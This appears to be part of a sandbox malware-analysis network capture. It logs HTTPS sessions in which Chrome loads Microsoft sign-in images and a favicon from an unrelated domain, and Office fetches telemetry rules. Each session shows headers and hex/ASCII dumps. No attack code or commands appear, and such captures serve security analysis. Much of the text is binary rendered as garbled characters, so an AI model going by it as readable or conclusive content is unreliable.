                                                                                                                                                                                                                                            18192.168.2.44976613.107.246.45443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:46 UTC418OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                                                                                                                                                                                                            Host: aadcdn.msauth.net
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2024-11-14 12:01:46 UTC785INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:46 GMT
                                                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                                                            Content-Length: 1435
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                                                                                            Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                                                                                                                                                            ETag: 0x8DB5C3F4911527F
                                                                                                                                                                                                                                            x-ms-request-id: 7ca68eb5-a01e-0008-7d7d-35aee6000000
                                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120146Z-1749fc9bdbdgs9sshC1DFWt6ws00000002k0000000008u58
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 4554691
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:01:46 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                                                                                                                                                                                                                            Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h
                                                                                                                                                                                                                                            2024-11-14 12:02:49 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:49 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:49 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                                                                                            x-ms-request-id: 6266d644-901e-0083-0e09-2cbb55000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120249Z-16547b76f7f9rdn9hC1DFWfk7s0000000keg00000000fw08
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:49 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            19192.168.2.449767192.254.232.133443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:46 UTC352OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                            Host: thewesteffect.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2024-11-14 12:01:46 UTC306INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:46 GMT
                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                                                                            Last-Modified: Tue, 25 Mar 2014 18:04:14 GMT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Content-Length: 2780
                                                                                                                                                                                                                                            Cache-Control: max-age=604800
                                                                                                                                                                                                                                            Expires: Thu, 21 Nov 2024 12:01:46 GMT
                                                                                                                                                                                                                                            Content-Type: image/x-icon
                                                                                                                                                                                                                                            2024-11-14 12:01:46 UTC2780INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 08 00 ab 03 00 00 26 00 00 00 20 20 00 00 01 00 08 00 0b 07 00 00 d1 03 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 03 72 49 44 41 54 38 cb 65 8f 59 68 5c 65 00 85 cf ff ff 77 72 e7 de 3b fb 98 65 26 cb 74 9c 4c 9b 26 99 34 6d 69 63 52 14 34 a6 49 a9 c6 ba 14 c1 e5 49 45 b4 3e f8 24 45 b0 8a 0a d2 a7 d2 17 05 a5 a0 0f 22 14 8b 08 a2 60 51 b4 76 79 48 2a d1 34 b4 4d da 2c 36 db 4c 66 32 93 99 3b 77 bf ff f5 a5 14 97 f3 fc 9d 8f 73 88 d8 ff 0c fe 17 ce 43 72 5b f6 14 af 54 c2 ba 9a 7f 13 84 2c 33 41 02 a5 3e d8 96 0a 42 c8 3d 94 09 2d dd ff ea 7a 8e 03 31 d1 fe 7a 6c d7 f0 71 49 0f 74 db 66 e9 3e db d6 a6 41 88 4a 40 fd 9c 3b f6 3f 05 e4 bf 0b 3c d7 91 e3
                                                                                                                                                                                                                                            Data Ascii: & PNGIHDRarIDAT8eYh\ewr;e&tL&4micR4IIE>$E"`QvyH*4M,6Lf2;wsCr[T,3A>B=-z1zlqItf>AJ@;?<


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            20192.168.2.44976413.107.246.45443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:46 UTC421OUTGET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1
                                                                                                                                                                                                                                            Host: aadcdn.msauth.net
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2024-11-14 12:01:46 UTC784INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:46 GMT
                                                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                                                            Content-Length: 199
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                                                                                            Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                                                                                                                                                                                                            ETag: 0x8DB5C3F49C21D98
                                                                                                                                                                                                                                            x-ms-request-id: 6fee74e0-901e-0024-0418-3335f6000000
                                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120146Z-r178fb8d765j7nnvhC1DFW39w400000001hg000000008vb4
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 4554691
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:01:46 UTC199INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00
                                                                                                                                                                                                                                            Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G
                                                                                                                                                                                                                                            2024-11-14 12:02:49 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:49 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:49 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1366
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                                                                                            x-ms-request-id: 14de8335-b01e-003e-77d2-2c8e41000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120249Z-16547b76f7fj5p7mhC1DFWf8w40000000kt0000000002vmv
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:49 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            21192.168.2.44976513.107.246.45443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:46 UTC417OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                                                                                                                                                                                                            Host: aadcdn.msauth.net
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2024-11-14 12:01:46 UTC784INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:46 GMT
                                                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                                                            Content-Length: 673
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                                                                                            Last-Modified: Wed, 24 May 2023 10:11:46 GMT
                                                                                                                                                                                                                                            ETag: 0x8DB5C3F47E260FD
                                                                                                                                                                                                                                            x-ms-request-id: 4fd473ff-d01e-0060-0604-33c876000000
                                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120146Z-1749fc9bdbdwv5sghC1DFWwp6n00000002a0000000008t1p
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 4554691
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:01:46 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                                                                                                                                                                                                                            Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A
                                                                                                                                                                                                                                            2024-11-14 12:02:49 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:49 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:49 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE976026E"
                                                                                                                                                                                                                                            x-ms-request-id: e4549384-201e-005d-130b-36afb3000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120249Z-r178fb8d7655k45rhC1DFWpsgg00000002c000000000a275
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:49 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            22192.168.2.44976313.107.246.45443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:46 UTC438OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1
                                                                                                                                                                                                                                            Host: aadcdn.msauth.net
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2024-11-14 12:01:46 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:46 GMT
                                                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                                                            Content-Length: 2407
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                                                                                            Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                                                                                                                                                                                                            ETag: 0x8DB5C3F499A9B99
                                                                                                                                                                                                                                            x-ms-request-id: f268c127-001e-003e-7650-362396000000
                                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120146Z-1749fc9bdbdwv5sghC1DFWwp6n00000002bg000000005v4h
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 4554691
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:01:46 UTC2407INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04
                                                                                                                                                                                                                                            Data Ascii: Y=s8mrfy8RlNkl?{$l|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx||y=/3kN2H;<sy
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:48 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:48 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1403
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                                                                                            x-ms-request-id: a35883a7-a01e-000d-7ea0-34d1ea000000
